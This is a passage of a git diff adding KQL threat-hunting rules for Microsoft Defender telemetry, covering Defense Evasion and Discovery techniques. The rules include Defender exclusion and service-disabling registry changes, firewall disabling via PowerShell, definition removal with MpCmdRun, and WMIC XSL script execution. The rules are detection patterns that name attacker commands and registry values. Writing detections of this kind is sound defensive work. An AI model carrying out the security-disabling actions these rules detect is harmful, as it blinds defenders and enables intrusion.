use of reg.exe or PowerShell to delete the Windows Defender context menu handler registry keys. +This action removes the "Scan with Microsoft Defender" option from the right-click menu for files, directories, and drives. +Attackers may use this technique to hinder manual, on-demand scans and reduce the visibility of the security product. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - May be part of a system customization or "debloating" script, but this is highly unusual in a managed corporate environment. + +DeviceProcessEvents +| where (ProcessCommandLine contains "del" or ProcessCommandLine contains "Remove-Item" or ProcessCommandLine contains "ri ") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll", "reg.exe"))) and ProcessCommandLine contains "\\shellex\\ContextMenuHandlers\\EPP" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql b/KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql new file mode 100644 index 00000000..181d55b8 --- /dev/null +++ b/KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql @@ -0,0 +1,10 @@ +// Title: Windows Defender Definition Files Removed +// Author: frack113 +// Date: 2021-07-07 +// Level: high +// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -RemoveDefinitions" and ProcessCommandLine contains " -All") and (FolderPath endswith "\\MpCmdRun.exe" or ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql b/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql new file mode 100644 index 00000000..da30cb5a --- /dev/null +++ b/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql @@ -0,0 +1,13 @@ +// Title: Windows Defender Exclusion List Modified +// Author: @BarryShooshooga +// Date: 2019-10-26 +// Level: medium +// Description: Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Intended exclusions by administrators + +DeviceRegistryEvents +| where RegistryKey endswith "\\Microsoft\\Windows Defender\\Exclusions*" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql b/KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql new file mode 100644 index 00000000..2e6cac82 --- /dev/null +++ b/KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql @@ -0,0 +1,12 @@ +// Title: Windows Defender Exclusions Added - Registry +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-07-06 +// Level: medium +// Description: Detects the Setting of Windows Defender Exclusions +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Administrator actions + +DeviceRegistryEvents +| where RegistryKey contains "\\Microsoft\\Windows Defender\\Exclusions" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql b/KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql new file mode 100644 index 00000000..e88fe052 --- /dev/null +++ b/KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql @@ -0,0 +1,12 @@ +// Title: Windows Defender Service Disabled - Registry +// Author: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali +// Date: 2022-08-01 +// Level: high +// Description: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Administrator actions + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000004)" and RegistryKey endswith "\\Services\\WinDefend\\Start" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql b/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql new file mode 100644 index 00000000..d6ec4baa --- /dev/null +++ b/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql @@ -0,0 +1,16 @@ +// Title: Windows Defender Threat Severity Default Action Modified +// Author: Matt Anderson (Huntress) +// Date: 2025-07-11 +// Level: high +// Description: Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'. +This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level, +allowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administration via scripts or tools (e.g., SCCM, Intune, GPO enforcement). Correlate with administrative activity. +// - Software installations that legitimately modify Defender settings (less common for these specific keys). + +DeviceRegistryEvents +| where (RegistryValueData in~ ("DWORD (0x00000006)", "DWORD (0x00000009)")) and RegistryKey endswith "\\Microsoft\\Windows Defender\\Threats\\ThreatSeverityDefaultAction*" and (RegistryKey endswith "\\1" or RegistryKey endswith "\\2" or RegistryKey endswith "\\4" or RegistryKey endswith "\\5") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql b/KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql new file mode 100644 index 00000000..b82d4d35 --- /dev/null +++ b/KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql @@ -0,0 +1,10 @@ +// Title: Windows Firewall Disabled via PowerShell +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-14 +// Level: medium +// Description: Detects attempts to disable the Windows Firewall using PowerShell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 + +DeviceProcessEvents +| where (ProcessCommandLine contains "Set-NetFirewallProfile " and ProcessCommandLine contains " -Enabled " and ProcessCommandLine contains " False") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains " -All " or ProcessCommandLine contains "Public" or ProcessCommandLine contains "Domain" or ProcessCommandLine contains "Private") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql b/KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql new file mode 100644 index 00000000..abfc6b7e --- /dev/null +++ b/KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql @@ -0,0 +1,12 @@ +// Title: Windows Kernel Debugger Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: medium +// Description: Detects execution of the Windows Kernel Debugger "kd.exe". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation +// False Positives: +// - Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required + +DeviceProcessEvents +| where FolderPath endswith "\\kd.exe" or ProcessVersionInfoOriginalFileName =~ "kd.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql b/KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql new file mode 100644 index 00000000..8edbb364 --- /dev/null +++ b/KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql @@ -0,0 +1,12 @@ +// Title: Windows Processes Suspicious Parent Directory +// Author: vburov +// Date: 2019-02-23 +// Level: low +// Description: Detect suspicious parent processes of well-known Windows processes +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003, attack.t1036.005 +// False Positives: +// - Some security products seem to spawn these + +DeviceProcessEvents +| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\lsaiso.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe") and (not((((InitiatingProcessFolderPath contains "\\Windows Defender\\" or InitiatingProcessFolderPath contains "\\Microsoft Security Client\\") and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath in~ ("", "-"))) or ((InitiatingProcessFolderPath endswith "\\SavService.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe") or (InitiatingProcessFolderPath contains "\\System32\\" or InitiatingProcessFolderPath contains "\\SysWOW64\\"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/winget_admin_settings_modification.kql b/KQL/rules/Defense Evasion/winget_admin_settings_modification.kql new file mode 100644 index 00000000..f5e81a55 --- /dev/null +++ b/KQL/rules/Defense Evasion/winget_admin_settings_modification.kql @@ -0,0 +1,12 @@ +// Title: Winget Admin Settings Modification +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-17 +// Level: low +// Description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence +// False Positives: +// - The event doesn't contain information about the type of change. False positives are expected with legitimate changes + +DeviceRegistryEvents +| where InitiatingProcessFolderPath endswith "\\winget.exe" and RegistryKey endswith "\\LocalState\\admin_settings" and RegistryKey =~ "\\REGISTRY\\A*" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql b/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql new file mode 100644 index 00000000..3ee057af --- /dev/null +++ b/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql @@ -0,0 +1,12 @@ +// Title: Wlrmdr.EXE Uncommon Argument Or Child Process +// Author: frack113, manasmbellani +// Date: 2022-02-16 +// Level: medium +// Description: Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries. +This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\wlrmdr.exe" or (((ProcessCommandLine contains "-a " or ProcessCommandLine contains "/a " or ProcessCommandLine contains "–a " or ProcessCommandLine contains "—a " or ProcessCommandLine contains "―a ") and (ProcessCommandLine contains "-f " or ProcessCommandLine contains "/f " or ProcessCommandLine contains "–f " or ProcessCommandLine contains "—f " or ProcessCommandLine contains "―f ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "/m " or ProcessCommandLine contains "–m " or ProcessCommandLine contains "—m " or ProcessCommandLine contains "―m ") and (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessCommandLine contains "-t " or ProcessCommandLine contains "/t " or ProcessCommandLine contains "–t " or ProcessCommandLine contains "—t " or ProcessCommandLine contains "―t ") and (ProcessCommandLine contains "-u " or ProcessCommandLine contains "/u " or ProcessCommandLine contains "–u " or ProcessCommandLine contains "—u " or ProcessCommandLine contains "―u ") and (FolderPath endswith "\\wlrmdr.exe" or ProcessVersionInfoOriginalFileName =~ "WLRMNDR.EXE")) and (not(((InitiatingProcessFolderPath in~ ("", "-")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\winlogon.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql b/KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql new file mode 100644 index 00000000..45ad31ac --- /dev/null +++ b/KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql @@ -0,0 +1,14 @@ +// Title: WMIC Loading Scripting Libraries +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-17 +// Level: medium +// Description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1220 +// False Positives: +// - The command wmic os get lastboottuptime loads vbscript.dll +// - The command wmic os get locale loads vbscript.dll +// - Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights + +DeviceImageLoadEvents +| where (FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\vbscript.dll") and InitiatingProcessFolderPath endswith "\\wmic.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql b/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql new file mode 100644 index 00000000..8b9c5f90 --- /dev/null +++ b/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql @@ -0,0 +1,12 @@ +// Title: Write Protect For Storage Disabled +// Author: Sreeman +// Date: 2021-06-11 +// Level: medium +// Description: Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. +This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 + +DeviceProcessEvents +| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control" and ProcessCommandLine contains "Write Protection" and ProcessCommandLine contains "0" and ProcessCommandLine contains "storage" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql b/KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql new file mode 100644 index 00000000..998683c9 --- /dev/null +++ b/KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql @@ -0,0 +1,10 @@ +// Title: Writing Of Malicious Files To The Fonts Folder +// Author: Sreeman +// Date: 2020-04-21 +// Level: medium +// Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from. +// MITRE Tactic: Defense Evasion +// Tags: attack.t1211, attack.t1059, attack.defense-evasion, attack.persistence, attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine contains "echo" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "type" or ProcessCommandLine contains "file createnew" or ProcessCommandLine contains "cacls") and ProcessCommandLine contains "C:\\Windows\\Fonts\\" and (ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh" or ProcessCommandLine contains ".reg" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl" or ProcessCommandLine contains ".inf" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql b/KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql new file mode 100644 index 00000000..97d8461a --- /dev/null +++ b/KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql @@ -0,0 +1,12 @@ +// Title: WSL Kali-Linux Usage +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-10 +// Level: high +// Description: Detects the use of Kali Linux through Windows Subsystem for Linux +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 +// False Positives: +// - Legitimate installation or usage of Kali Linux WSL by administrators or security teams + +DeviceProcessEvents +| where (((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\packages\\KaliLinux") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\kali.exe")) or (FolderPath contains ":\\Program Files\\WindowsApps\\KaliLinux." and FolderPath endswith "\\kali.exe")) or ((((FolderPath contains "\\kali.exe" or FolderPath contains "\\KaliLinux") or (ProcessCommandLine contains "Kali.exe" or ProcessCommandLine contains "Kali-linux" or ProcessCommandLine contains "kalilinux")) and (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe")) and (not((ProcessCommandLine contains " -i " or ProcessCommandLine contains " --install " or ProcessCommandLine contains " --unregister ")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql b/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql new file mode 100644 index 00000000..7807774f --- /dev/null +++ b/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql @@ -0,0 +1,13 @@ +// Title: XBAP Execution From Uncommon Locations Via PresentationHost.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-01 +// Level: medium +// Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 +// False Positives: +// - Legitimate ".xbap" being executed via "PresentationHost" + +DeviceProcessEvents +| where (ProcessCommandLine contains ".xbap" and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")) and (not((ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " C:\\Program Files"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql b/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql new file mode 100644 index 00000000..9b3691dc --- /dev/null +++ b/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql @@ -0,0 +1,16 @@ +// Title: XSL Script Execution Via WMIC.EXE +// Author: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel +// Date: 2019-10-21 +// Level: medium +// Description: Detects the execution of WMIC with the "format" flag to potentially load XSL files. +Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. +Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1220 +// False Positives: +// - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment. +// - Static format arguments - https://petri.com/command-line-wmi-part-3 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-format" or ProcessCommandLine contains "/format" or ProcessCommandLine contains "–format" or ProcessCommandLine contains "—format" or ProcessCommandLine contains "―format") and FolderPath endswith "\\wmic.exe") and (not((ProcessCommandLine contains "Format:List" or ProcessCommandLine contains "Format:htable" or ProcessCommandLine contains "Format:hform" or ProcessCommandLine contains "Format:table" or ProcessCommandLine contains "Format:mof" or ProcessCommandLine contains "Format:value" or ProcessCommandLine contains "Format:rawxml" or ProcessCommandLine contains "Format:xml" or ProcessCommandLine contains "Format:csv"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql b/KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql new file mode 100644 index 00000000..f09e0895 --- /dev/null +++ b/KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql @@ -0,0 +1,10 @@ +// Title: Active Directory Database Snapshot Via ADExplorer +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-14 +// Level: medium +// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482 + +DeviceProcessEvents +| where ProcessCommandLine contains "snapshot" and ((FolderPath endswith "\\ADExp.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADExplorer64a.exe") or ProcessVersionInfoOriginalFileName =~ "AdExp" or ProcessVersionInfoFileDescription =~ "Active Directory Editor" or ProcessVersionInfoProductName =~ "Sysinternals ADExplorer") \ No newline at end of file diff --git a/KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql b/KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql new file mode 100644 index 00000000..72ac1e7b --- /dev/null +++ b/KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql @@ -0,0 +1,12 @@ +// Title: ADExplorer Writing Complete AD Snapshot Into .dat File +// Author: Arnim Rupp (Nextron Systems), Thomas Patzke +// Date: 2025-07-09 +// Level: medium +// Description: Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482 +// False Positives: +// - Legitimate use of ADExplorer by administrators creating .dat snapshots + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\ADExp.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64a.exe") and FolderPath endswith ".dat" \ No newline at end of file diff --git a/KQL/rules/Discovery/advanced_ip_scanner_file_event.kql b/KQL/rules/Discovery/advanced_ip_scanner_file_event.kql new file mode 100644 index 00000000..66ee8f06 --- /dev/null +++ b/KQL/rules/Discovery/advanced_ip_scanner_file_event.kql @@ -0,0 +1,12 @@ +// Title: Advanced IP Scanner - File Event +// Author: @ROxPinTeddy +// Date: 2020-05-12 +// Level: medium +// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1046 +// False Positives: +// - Legitimate administrative use + +DeviceFileEvents +| where FolderPath contains "\\AppData\\Local\\Temp\\Advanced IP Scanner 2" \ No newline at end of file diff --git a/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql b/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql new file mode 100644 index 00000000..8fcbe710 --- /dev/null +++ b/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql @@ -0,0 +1,12 @@ +// Title: Azure AD Health Monitoring Agent Registry Keys Access +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +// Date: 2021-08-26 +// Level: medium +// Description: This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. +This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1012 + +DeviceRegistryEvents +| where RegistryKey =~ "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent" and (not((InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.InsightsService.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.PshSurrogate.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql b/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql new file mode 100644 index 00000000..2174de59 --- /dev/null +++ b/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql @@ -0,0 +1,14 @@ +// Title: Azure AD Health Service Agents Registry Keys Access +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +// Date: 2021-08-26 +// Level: medium +// Description: This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). +Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). +This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. +Make sure you set the SACL to propagate to its sub-keys. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1012 + +DeviceRegistryEvents +| where RegistryKey =~ "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\ADHealthAgent" and (not((InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.InsightsService.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Adfs.PshSurrogate.exe" or InitiatingProcessFolderPath contains "Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/bloodhound_collection_files.kql b/KQL/rules/Discovery/bloodhound_collection_files.kql new file mode 100644 index 00000000..3a14b15a --- /dev/null +++ b/KQL/rules/Discovery/bloodhound_collection_files.kql @@ -0,0 +1,12 @@ +// Title: BloodHound Collection Files +// Author: C.J. May +// Date: 2022-08-09 +// Level: high +// Description: Detects default file names outputted by the BloodHound collection tool SharpHound +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001 +// False Positives: +// - Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise + +DeviceFileEvents +| where (FolderPath endswith "BloodHound.zip" or FolderPath endswith "_computers.json" or FolderPath endswith "_containers.json" or FolderPath endswith "_domains.json" or FolderPath endswith "_gpos.json" or FolderPath endswith "_groups.json" or FolderPath endswith "_ous.json" or FolderPath endswith "_users.json") and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath endswith "\\pocket_containers.json" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft."))) \ No newline at end of file diff --git a/KQL/rules/Discovery/capabilities_discovery_linux.kql b/KQL/rules/Discovery/capabilities_discovery_linux.kql new file mode 100644 index 00000000..32b05ec8 --- /dev/null +++ b/KQL/rules/Discovery/capabilities_discovery_linux.kql @@ -0,0 +1,10 @@ +// Title: Capabilities Discovery - Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-28 +// Level: low +// Description: Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -r " or ProcessCommandLine contains " /r " or ProcessCommandLine contains " –r " or ProcessCommandLine contains " —r " or ProcessCommandLine contains " ―r ") and FolderPath endswith "/getcap" \ No newline at end of file diff --git a/KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql b/KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql new file mode 100644 index 00000000..c7b93053 --- /dev/null +++ b/KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql @@ -0,0 +1,12 @@ +// Title: Computer Discovery And Export Via Get-ADComputer Cmdlet +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-11-10 +// Level: medium +// Description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033 +// False Positives: +// - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often + +DeviceProcessEvents +| where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADComputer " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql b/KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql new file mode 100644 index 00000000..76de5d85 --- /dev/null +++ b/KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql @@ -0,0 +1,10 @@ +// Title: Computer System Reconnaissance Via Wmic.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-08 +// Level: medium +// Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1047 + +DeviceProcessEvents +| where ProcessCommandLine contains "computersystem" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql b/KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql new file mode 100644 